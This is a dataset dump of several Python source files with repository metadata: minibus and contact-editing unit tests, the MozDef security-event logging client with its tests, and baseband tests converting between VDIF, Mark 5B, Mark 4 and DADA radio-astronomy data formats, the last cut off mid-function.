text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
import unittest
from jsonschema import SchemaError
from minibus import MiniBusClient
class SyntaxTest(unittest.TestCase):
def setUp(self):
self.client = MiniBusClient()
def callback(self):
pass
def callback2(self):
pass
def test_sub_good(self):
self.client.subscribe("test_sub_good", {'type': "number"}, self.callback)
def test_sub_bad_schema(self):
self.assertRaises(SchemaError, self.client.subscribe,
"test_sub_bad_schema", {"type": "orange"}, self.callback)
def test_sub_schema_mismatch(self):
self.client.subscribe("test_sub_schema_mismatch", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_mismatch", {"type": "string"}, self.callback2)
def test_sub_schema_dupcallback(self):
self.client.subscribe("test_sub_schema_dupcallback", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_dupcallback", {"type": "number"}, self.callback)
if __name__ == "__main__":
unittest.main()
|
allohakdan/minibus
|
test/test_syntax.py
|
Python
|
apache-2.0
| 1,148 | 0.008711 |
from model.contact import Contact
from random import randrange
def test_edit_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(first_name ="Sabina", last_name="test", company="Pewex",
address="osiedle", phone_home="123456789", e_mail="sabina@sabina.pl",
year="2016",))
old_contact = db.get_contact_list()
index = randrange(len(old_contact))
contact = Contact(first_name='Kasia', last_name='Bober')
contact.id = old_contact[index].id
app.contact.edit_contact_by_index(index, contact)
assert len(old_contact) == app.contact.count()
new_contact = db.get_contact_list()
old_contact[index] = contact
assert old_contact == new_contact
if check_ui:
assert sorted(new_contact, key=Contact.id_or_max) == sorted(
app.group.get_contact_list(), key=Contact.id_or_max
)
|
sabinaczopik/python_training
|
test/test_edit_contact.py
|
Python
|
apache-2.0
| 949 | 0.004215 |
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2014 Mozilla Corporation
# Author: gdestuynder@mozilla.com
# Author: ameihm@mozilla.com
import os
import sys
from datetime import datetime
import pytz
import json
import socket
import syslog
# http://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/limits-messages.html
SQS_MAX_MESSAGE_SIZE = 256 * 1024
try:
from requests_futures.sessions import FuturesSession as Session
futures_loaded = True
except ImportError:
from requests import Session
futures_loaded = False
try:
import boto3
boto_loaded = True
except ImportError:
boto_loaded = False
import unittest
class MozDefError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
class MozDefMessage(object):
# Supported message types
MSGTYPE_NONE = 0
MSGTYPE_EVENT = 1
MSGTYPE_COMPLIANCE = 2
MSGTYPE_VULNERABILITY = 3
MSGTYPE_ASSETHINT = 4
MSGTYPE_RRA = 5
def __init__(self, url):
self._msgtype = self.MSGTYPE_NONE
self.log = {}
self._sendlog = {}
self._httpsession = Session()
self._httpsession.trust_env = False
self._url = url
self.hostname = socket.getfqdn()
# This is due to some systems incorrectly
# setting the hostname field to localhost.localdomain
# so, we add logic to use a different 'hostname' method
# if that's the case
if self.hostname == 'localhost.localdomain':
self.hostname = socket.gethostname()
# Set some default options
self._send_to_syslog = False
self._send_to_sqs = False
self._syslog_only = False
self._fire_and_forget = False
self._verify_certificate = False
self._verify_path = None
def validate(self):
return True
def validate_log(self):
return True
def set_verify(self, f):
self._verify_certificate = f
def set_verify_path(self, p):
self._verify_path = p
def set_fire_and_forget(self, f):
self._fire_and_forget = f
def set_sqs_queue_name(self, f):
self._sqs_queue_name = f
def set_sqs_aws_account_id(self, f):
self._sqs_aws_account_id = f
def set_sqs_region(self, f):
self._sqs_region = f
def set_send_to_sqs(self, f):
self._send_to_sqs = f
def set_send_to_syslog(self, f, only_syslog=False):
self._send_to_syslog = f
self._syslog_only = only_syslog
def syslog_convert(self):
raise MozDefError('message type does not support syslog conversion')
def construct(self):
raise MozDefError('subclass of MozDefMessage must override construct()')
def _httpsession_cb(self, session, response):
if response.result().status_code != 200:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r' % \
response.result().status_code)
def send_syslog(self):
raise MozDefError('message type does not support syslog submission')
def send(self):
if not self.validate():
raise MozDefError('message failed validation')
self.construct()
if not self.validate_log():
raise MozDefError('message failed post construct validation')
if self._send_to_syslog:
self.send_syslog()
if self._syslog_only:
return
if self._send_to_sqs:
self.send_sqs()
return
vflag = self._verify_certificate
if vflag:
if self._verify_path != None:
vflag = self._verify_path
buf = json.dumps(self._sendlog, sort_keys=True, indent=4)
# Compatibility notes:
# When updating either path (futures_loaded or not loaded) please ensure both have the same functionality
# future_loaded is used by Python 2, the non-loaded version if for Python 3
if futures_loaded:
self._httpsession.post(self._url, buf,
verify=vflag,
background_callback=self._httpsession_cb)
else:
response = self._httpsession.post(self._url, buf,
verify=vflag)
if response.ok == False:
if not self._fire_and_forget:
raise MozDefError('POST failed with code %r msg %s' % \
(response.status_code, response.text))
# Simple Message Submission
#
# This class wraps the new MozDefEvent class to provide support for
# older applications that use the legacy API, and provide simplified access
# to generation of event messages.
class MozDefMsg(object):
def __init__(self, hostname, summary=None, category='event',
severity='INFO', tags=[], details={}):
self.summary = summary
self.category = category
self.details = details
self.tags = tags
self.severity = severity
self.hostname = hostname
self.log = {}
self.log['details'] = {}
self.log['tags'] = []
self.fire_and_forget_mode = False
self.verify_certificate = True
self.sendToSyslog = False
self.sendToSqs = False
self.sqsQueueName = None
self.sqsAWSAccountId = None
self.sqsRegion = None
self.syslogOnly = False
def send(self, summary=None, category=None, severity=None, tags=None,
details=None):
tsummary = summary
tcategory = category
tseverity = severity
ttags = tags
tdetails = details
if tsummary == None:
tsummary = self.summary
if tcategory == None:
tcategory = self.category
if tseverity == None:
tseverity = self.severity
if ttags == None:
ttags = self.tags
if tdetails == None:
tdetails = self.details
amsg = MozDefEvent(self.hostname)
amsg.set_simple_update_log(self.log)
amsg.summary = tsummary
amsg.tags = ttags
amsg.details = tdetails
if type(self.verify_certificate) is str:
amsg.set_verify(True)
amsg.set_verify_path(self.verify_certificate)
else:
amsg.set_verify(self.verify_certificate)
amsg.set_fire_and_forget(self.fire_and_forget_mode)
amsg.set_category(tcategory)
amsg.set_severity_from_string(tseverity)
amsg.set_send_to_syslog(self.sendToSyslog,
only_syslog=self.syslogOnly)
amsg.set_sqs_queue_name(self.sqsQueueName)
amsg.set_sqs_aws_account_id(self.sqsAWSAccountId)
amsg.set_sqs_region(self.sqsRegion)
amsg.set_send_to_sqs(self.sendToSqs)
amsg.send()
class MozDefVulnerability(MozDefMessage):
def validate_log(self):
for k in ['utctimestamp', 'description', 'vuln', 'asset',
'sourcename']:
if k not in self._sendlog.keys():
return False
for k in ['assetid', 'ipv4address', 'hostname', 'macaddress']:
if k not in self._sendlog['asset'].keys():
return False
for k in ['status', 'vulnid', 'title', 'discovery_time', 'age_days',
'known_malware', 'known_exploits', 'cvss', 'cves']:
if k not in self._sendlog['vuln'].keys():
return False
return True
def construct(self):
self._sendlog = self.log
def __init__(self, url):
MozDefMessage.__init__(self, url)
self._msgtype = self.MSGTYPE_VULNERABILITY
class MozDefEvent(MozDefMessage):
SEVERITY_INFO = 0
SEVERITY_WARNING = 1
SEVERITY_CRITICAL = 2
SEVERITY_ERROR = 3
SEVERITY_DEBUG = 4
_sevmap = {
SEVERITY_INFO: ['INFO', syslog.LOG_INFO],
SEVERITY_WARNING: ['WARNING', syslog.LOG_WARNING],
SEVERITY_CRITICAL: ['CRITICAL', syslog.LOG_CRIT],
SEVERITY_ERROR: ['ERROR', syslog.LOG_ERR],
SEVERITY_DEBUG: ['DEBUG', syslog.LOG_DEBUG],
}
def __init__(self, url):
MozDefMessage.__init__(self, url)
self._msgtype = self.MSGTYPE_EVENT
self._category = 'event'
self._process_name = sys.argv[0]
self._process_id = os.getpid()
self._severity = self.SEVERITY_INFO
self.timestamp = None
self._updatelog = None
self.summary = None
self.tags = []
self.details = {}
def validate(self):
if self.summary == None or self.summary == '':
return False
return True
def set_simple_update_log(self, l):
self._updatelog = l
def set_severity(self, x):
self._severity = x
def set_category(self, x):
self._category = x
def set_severity_from_string(self, x):
self._severity = self.SEVERITY_INFO
for i in self._sevmap:
if self._sevmap[i][0] == x:
self._severity = i
def syslog_convert(self):
s = json.dumps(self._sendlog)
return s
def send_syslog(self):
syspri = syslog.LOG_INFO
for i in self._sevmap:
if i == self._severity:
syspri = self._sevmap[i][1]
syslog.syslog(self.syslog_convert())
def send_sqs(self):
if not boto_loaded:
raise ImportError("boto3 not loaded")
boto3.setup_default_session(region_name=self._sqs_region)
sqs = boto3.resource('sqs')
if (self._sqs_aws_account_id != None):
queue = sqs.get_queue_by_name(QueueName=self._sqs_queue_name,
QueueOwnerAWSAccountId=self._sqs_aws_account_id)
else:
queue = sqs.get_queue_by_name(QueueName=self._sqs_queue_name)
message_body = json.dumps(self._sendlog)
if len(message_body) > SQS_MAX_MESSAGE_SIZE:
raise MozDefError(
'message length of %s is over the SQS maximum allowed message '
'size of %s' % (len(message_body), SQS_MAX_MESSAGE_SIZE))
try:
response = queue.send_message(MessageBody=message_body)
except (botocore.exceptions.ClientError,
botocore.parsers.ResponseParserError) as e:
raise MozDefError(
'message failed to send to SQS due to %s' % e)
return response
def construct(self):
self._sendlog = {}
if self._updatelog != None:
self._sendlog = self._updatelog
if self.timestamp == None:
self._sendlog['timestamp'] = \
pytz.timezone('UTC').localize(datetime.utcnow()).isoformat()
else:
self._sendlog['timestamp'] = self.timestamp
self._sendlog['processid'] = self._process_id
self._sendlog['processname'] = self._process_name
self._sendlog['hostname'] = self.hostname
self._sendlog['category'] = self._category
self._sendlog['details'] = self.details
self._sendlog['summary'] = self.summary
self._sendlog['tags'] = self.tags
for i in self._sevmap:
if i == self._severity:
self._sendlog['severity'] = self._sevmap[i][0]
class MozDefRRA(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
if self.category != 'rra_data':
return False
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_RRA
self._category = 'rra_data'
class MozDefAssetHint(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
# A hint event should always have details
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_ASSETHINT
self._category = 'asset_hint'
class MozDefCompliance(MozDefEvent):
def validate_log(self):
if 'details' not in self._sendlog:
return False
t = self._sendlog['details']
for k in ['target', 'policy', 'check', 'compliance', 'link',
'utctimestamp']:
if k not in t.keys():
return False
for k in ['level', 'name', 'url']:
if k not in t['policy'].keys():
return False
for k in ['description', 'location', 'name', 'test']:
if k not in t['check'].keys():
return False
for k in ['type', 'value']:
if k not in t['check']['test'].keys():
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_COMPLIANCE
self._category = 'complianceitems'
class MozDefTests(unittest.TestCase):
def create_valid_event(self):
self.emsg_summary = 'a test event'
self.emsg_tags = ['generic', 'test']
self.emsg_details = {'one': 1, 'two': 'two'}
def create_valid_vuln(self):
self.vulnmsg = {}
self.vulnmsg['description'] = 'system vulnerability management ' \
'automation'
self.vulnmsg['utctimestamp'] = '2015-01-21T15:33:51.136378+00:00'
self.vulnmsg['sourcename'] = 'development'
self.vulnmsg['asset'] = {}
self.vulnmsg['asset']['assetid'] = 23
self.vulnmsg['asset']['ipv4address'] = '1.2.3.4'
self.vulnmsg['asset']['macaddress'] = ''
self.vulnmsg['asset']['hostname'] = 'git.mozilla.com'
self.vulnmsg['vuln'] = {}
self.vulnmsg['vuln']['status'] = 'new'
self.vulnmsg['vuln']['vulnid'] = 'nexpose:43883'
self.vulnmsg['vuln']['title'] = \
'RHSA-2013:1475: postgresql and postgresql84 security update'
self.vulnmsg['vuln']['discovery_time'] = 1421845863
self.vulnmsg['vuln']['age_days'] = 32.7
self.vulnmsg['vuln']['known_malware'] = False
self.vulnmsg['vuln']['known_exploits'] = False
self.vulnmsg['vuln']['cvss'] = 8.5
self.vulnmsg['vuln']['cves'] = ['CVE-2013-022', 'CVE-2013-1900']
def create_valid_comp(self):
self.compmsg = {}
self.compmsg['target'] = 'www.mozilla.com'
self.compmsg['utctimestamp'] = '2015-03-04T18:25:52.849272+00:00'
self.compmsg['tags'] = {
'operator': 'it',
'autogroup': 'opsec'
}
self.compmsg['compliance'] = True
self.compmsg['link'] = 'http://a.url'
self.compmsg['policy'] = {
'url': 'http://another.url',
'name': 'system',
'level': 'medium'
}
self.compmsg['check'] = {
'test': {
'type': 'nexpose',
'name': 'assess',
'value': 'nexpose'
},
'location': 'endpoint',
'ref': 'sysmediumupdates1',
'name': 'vulnerability scanner check',
'description': 'validate system patch level'
}
def setUp(self):
self.create_valid_vuln()
self.create_valid_comp()
self.create_valid_event()
def testFailMessageSend(self):
m = MozDefMessage('http://127.0.0.1')
with self.assertRaises(MozDefError):
m.send()
def testFailEventSend(self):
m = MozDefEvent('http://127.0.0.1:1/nonexistent')
with self.assertRaises(Exception):
m.send()
def testMozdefMessage(self):
m = MozDefMessage('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEvent(self):
m = MozDefEvent('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertEqual(m._msgtype, MozDefMessage.MSGTYPE_EVENT)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEventValidate(self):
m = MozDefEvent('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'test event'
self.assertTrue(m.validate())
def testMozdefEventConstruct(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = 'test event'
m.construct()
self.assertEqual(m._sendlog['category'], 'event')
self.assertEqual(m._sendlog['summary'], 'test event')
def testMozdefEventHostname(self):
m = MozDefEvent('http://127.0.0.1')
m.hostname = 'samplehostname'
self.assertEqual(m.hostname, 'samplehostname')
def testMozdefVulnValidate(self):
m = MozDefVulnerability('http://127.0.0.1')
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.log = self.vulnmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefComplianceValidate(self):
m = MozDefCompliance('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'compliance item'
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.details = self.compmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefEventSyslog(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = self.emsg_summary
m.tags = self.emsg_tags
m.details = self.emsg_details
m.set_severity(MozDefEvent.SEVERITY_CRITICAL)
m.construct()
s = m.syslog_convert()
self.assertIsNotNone(s)
m.set_send_to_syslog(True, only_syslog=True)
m.send()
def testMozdefCompSyslog(self):
m = MozDefCompliance('http://127.0.0.1')
m.log = self.compmsg
self.assertIsNotNone(m.syslog_convert())
def testAssetHintValidate(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an asset hint event'
self.assertFalse(m.validate())
m.details = {'hostname': 'test'}
self.assertTrue(m.validate())
def testAssetHint(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertIsNotNone(m)
def testRRAValidate(self):
m = MozDefRRA('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an RRA event'
m.category = 'rra_data'
self.assertFalse(m.validate())
m.details = {'metadata': {'service': 'test'}}
self.assertTrue(m.validate())
def testRRA(self):
m = MozDefRRA('http://127.0.0.1')
self.assertIsNotNone(m)
def testSimpleMsg(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
self.assertIsNotNone(m)
def testSimpleSqs(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
if not boto_loaded:
raise ImportError("Boto3 is not loaded")
m.sendToSqs = True
m.sqsRegion = 'us-west-1'
m.sqsQueueName = 'test'
m.sqsAWSAccountId = 'test'
m.send('hi')
self.assertIsNotNone(m)
def testSimpleSyslog(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
m.sendToSyslog = True
m.syslogOnly = True
m.fire_and_forget_mode = True
m.log['somefield'] = 'test'
with self.assertRaises(MozDefError):
m.send()
m.send('hi')
def testSimpleSyslogDetails(self):
m = MozDefMsg('http://127.0.0.1')
m.sendToSyslog = True
m.syslogOnly = True
m.fire_and_forget_mode = True
m.send('hi', details={'username': 'user'}, tags=['y0'])
def testMozdefCompSyslogSend(self):
m = MozDefCompliance('http://127.0.0.1')
m.summary = 'compliance item'
m.details = self.compmsg
m.set_send_to_syslog(True, only_syslog=True)
m.send()
if __name__ == "__main__":
unittest.main(verbosity=2)
|
ameihm0912/mozdef_client
|
mozdef_client.py
|
Python
|
mpl-2.0
| 20,473 | 0.00254 |
# Licensed under the GPLv3 - see LICENSE
import pytest
import numpy as np
import astropy.units as u
from astropy.time import Time
from .. import vdif
from .. import mark4
from .. import mark5b
from .. import dada
from ..base.encoding import EIGHT_BIT_1_SIGMA
from ..data import (SAMPLE_MARK4 as SAMPLE_M4, SAMPLE_MARK5B as SAMPLE_M5B,
SAMPLE_VDIF, SAMPLE_MWA_VDIF as SAMPLE_MWA, SAMPLE_DADA,
SAMPLE_BPS1_VDIF)
class TestVDIFMark5B:
"""Simplest conversion: VDIF frame containing Mark5B data (EDV 0xab)."""
def test_header(self):
"""Check Mark 5B header information can be stored in a VDIF header."""
with open(SAMPLE_M5B, 'rb') as fh:
# Start time kiloday is needed for Mark 5B to calculate time.
m5h1 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# For the payload, pass in how data is encoded.
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# A not-at-the-start header for checking times.
m5h2 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# Create VDIF headers based on both the Mark 5B header and payload.
header1 = vdif.VDIFHeader.from_mark5b_header(
m5h1, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
header2 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
for i, (m5h, header) in enumerate(((m5h1, header1), (m5h2, header2))):
assert m5h['frame_nr'] == i
# Check all direct information is set correctly.
assert all(m5h[key] == header[key] for key in m5h.keys())
assert header['mark5b_frame_nr'] == m5h['frame_nr']
assert header.kday == m5h.kday
# As well as the time calculated from the header information.
assert header.time == m5h.time
# Check information on the payload is also correct.
assert header.nchan == 8
assert header.bps == 2
assert not header['complex_data']
assert header.frame_nbytes == 10032
assert header.nbytes == 32
assert header.payload_nbytes == m5h.payload_nbytes
assert (header.samples_per_frame
== 10000 * 8 // m5pl.bps // m5pl.sample_shape.nchan)
# Check that we can handle > 512 Mbps sampling rate.
header3 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps,
sample_rate=64*u.MHz)
assert header3.time == header2.time
assert header3['frame_nr'] == m5h2['frame_nr']
# A copy might remove any `kday` keywords set, but should still work
# (Regression test for #34)
header_copy = header2.copy()
assert header_copy == header2
header_copy.verify()
# But it should not remove `kday` to start with (#35)
assert header_copy.kday == header2.kday
# May as well check that with a corrupt 'bcd_fraction' we can still
# get the right time using the frame number.
header_copy['bcd_fraction'] = 0
# This is common enough that we should not fail verification.
header_copy.verify()
# However, it should also cause just getting the time to fail
# unless we pass in a frame rate.
with pytest.raises(ValueError):
header_copy.time
frame_rate = 32. * u.MHz / header.samples_per_frame
assert abs(header_copy.get_time(frame_rate=frame_rate)
- m5h2.time) < 1.*u.ns
def test_payload(self):
"""Check Mark 5B payloads can used in a Mark5B VDIF payload."""
# Get Mark 5B header, payload, and construct VDIF header, as above.
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
header = vdif.VDIFHeader.from_mark5b_header(
m5h, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
# Create VDIF payload from the Mark 5B encoded payload.
payload = vdif.VDIFPayload(m5pl.words, header)
# Check that the payload (i.e., encoded data) is the same.
assert np.all(payload.words == m5pl.words)
# And check that if we decode the payload, we get the same result.
assert np.all(payload.data == m5pl.data)
# Now construct a VDIF payload from the Mark 5B data, checking that
# the encoding works correctly too.
payload2 = vdif.VDIFPayload.fromdata(m5pl.data, header)
assert np.all(payload2.words == m5pl.words)
assert np.all(payload2.data == m5pl.data)
# Mark 5B data cannot complex. Check that this raises an exception.
header2 = header.copy()
with pytest.raises(ValueError):
header2.complex_data = True
with pytest.raises(ValueError):
header2['complex_data'] = True
with pytest.raises(ValueError):
vdif.VDIFPayload.fromdata(m5pl.data.view(complex), bps=2, edv=0xab)
def test_frame(self):
"""Check a whole Mark 5B frame can be translated to VDIF."""
with mark5b.open(SAMPLE_M5B, 'rb', ref_time=Time(57000, format='mjd'),
nchan=8, bps=2) as fh:
# pick second frame just to be different from header checks above.
fh.seek(10016)
m5f = fh.read_frame()
assert m5f['frame_nr'] == 1
frame = vdif.VDIFFrame.from_mark5b_frame(m5f)
assert frame.nbytes == 10032
assert frame.shape == (5000, 8)
assert np.all(frame.data == m5f.data)
assert frame.time == m5f.time
def test_stream(self):
"""Check we can encode a whole stream."""
class TestVDIF0VDIF1:
"""Conversion between EDV versions."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_MWA, 'rs', sample_rate=1.28*u.MHz) as f0:
h0 = f0.header0
d0 = f0.read(1024)
kwargs = dict(h0)
kwargs['edv'] = 1
fl = str(tmpdir.join('test1.vdif'))
with vdif.open(fl, 'ws', sample_rate=1.28*u.MHz, **kwargs) as f1w:
h1w = f1w.header0
assert list(h1w.words[:4]) == list(h0.words[:4])
assert h1w.sample_rate == 1.28*u.MHz
f1w.write(d0)
with vdif.open(fl, 'rs') as f1r:
h1r = f1r.header0
d1r = f1r.read(1024)
assert h1r.words[:4] == h0.words[:4]
assert h1w.sample_rate == 1.28*u.MHz
assert np.all(d1r == d0)
class TestMark5BToVDIF3:
"""Real conversion: Mark5B to VDIF EDV 3, and back to Mark5B"""
def test_header(self):
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# check that we have enough information to create VDIF EDV 3 header.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=m5pl.bps, sample_shape=(1,), station='WB',
time=m5h.time, sample_rate=32.*u.MHz, complex_data=False)
assert header.time == m5h.time
def test_stream(self, tmpdir):
"""Convert Mark 5B data stream to VDIF."""
# Here, we need to give how the data is encoded, since the data do not
# self-describe this. Furthermore, we need to pass in a rough time,
# and the rate at which samples were taken, so that absolute times can
# be calculated.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fr:
m5h = fr.header0
# create VDIF header from Mark 5B stream information.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=fr.bps, nchan=1, station='WB', time=m5h.time,
sample_rate=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
"""Real conversion: VDIF EDV 3 to Mark5B."""
def test_header(self):
with open(SAMPLE_VDIF, 'rb') as fh:
vh = vdif.VDIFHeader.fromfile(fh)
header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
assert header.time == vh.time
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_VDIF, 'rs') as fr:
vh = fr.header0
data = fr.read(20000) # enough to fill two Mark 5B frames.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
fw.write(data)
with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
fl, 'rs', sample_rate=32.*u.MHz,
ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
assert fv.header0.time == fm.header0.time
dv = fv.read(20000)
dm = fm.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
"""Real conversion: VDIF EDV 3, BPS 1 to Mark 5B."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
start_time = fr.start_time
data = fr.read(5000) # Just one Mark 5B frame.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
bps=1, time=start_time) as fw:
fw.write(data)
fw.write(data)
with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
sample_rate=8*u.MHz) as fv, mark5b.open(
fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
ref_time=Time('2018-09-01')) as fm:
assert fv.start_time == fm.start_time
dv = fv.read(5000)
dm = fm.read(5000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
dm = fm.read(5000)
assert np.all(dm == dv)
class TestMark4ToVDIF1:
"""Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.
Here, need to use a VDIF format with a flexible size, since we want
to create invalid frames corresponding to the pieces of data overwritten
by the Mark 4 header.
"""
def test_header(self):
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
# Check that we have enough information to create VDIF EDV 1 header.
header = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
assert abs(header.time - m4h.time) < 2. * u.ns
def test_stream(self, tmpdir):
with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
ntrack=64, decade=2010) as fr:
m4header0 = fr.header0
start_time = fr.start_time
vheader0 = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4header0.bps, nchan=1, station='Ar',
time=start_time, sample_rate=32.*u.MHz,
payload_nbytes=640*2//8, complex_data=False)
assert abs(vheader0.time - start_time) < 2. * u.ns
data = fr.read(80000) # full Mark 4 frame
offset1 = fr.tell()
time1 = fr.tell(unit='time')
number_of_bytes = fr.fh_raw.tell() - 0xa88
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
orig_bytes = fh.read(number_of_bytes)
fl = str(tmpdir.join('test.vdif'))
with vdif.open(fl, 'ws', header0=vheader0,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - start_time) < 2. * u.ns
# Write first VDIF frame, matching Mark 4 Header, hence invalid.
fw.write(data[:160], valid=False)
# Write remaining VDIF frames, with valid data.
fw.write(data[160:])
assert (fw.tell(unit='time') - time1) < 2. * u.ns
with vdif.open(fl, 'rs') as fv:
assert abs(fv.header0.time - start_time) < 2. * u.ns
expected = vheader0.copy()
expected['invalid_data'] = True
assert fv.header0 == expected
dv = fv.read(80000)
assert np.all(dv == data)
assert fv.offset == offset1
assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
# Convert VDIF file back to Mark 4, and check byte-for-byte.
fl2 = str(tmpdir.join('test.m4'))
with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
ntrack=64, bps=2, fanout=4, time=vheader0.time,
system_id=108) as fw:
fw.write(dv)
with open(fl2, 'rb') as fh:
conv_bytes = fh.read()
assert len(conv_bytes) == len(conv_bytes)
assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
def get_vdif_header(self, header):
return vdif.VDIFHeader.fromvalues(
edv=1, time=header.time, sample_rate=header.sample_rate,
bps=header.bps, nchan=header['NCHAN'],
complex_data=header.complex_data,
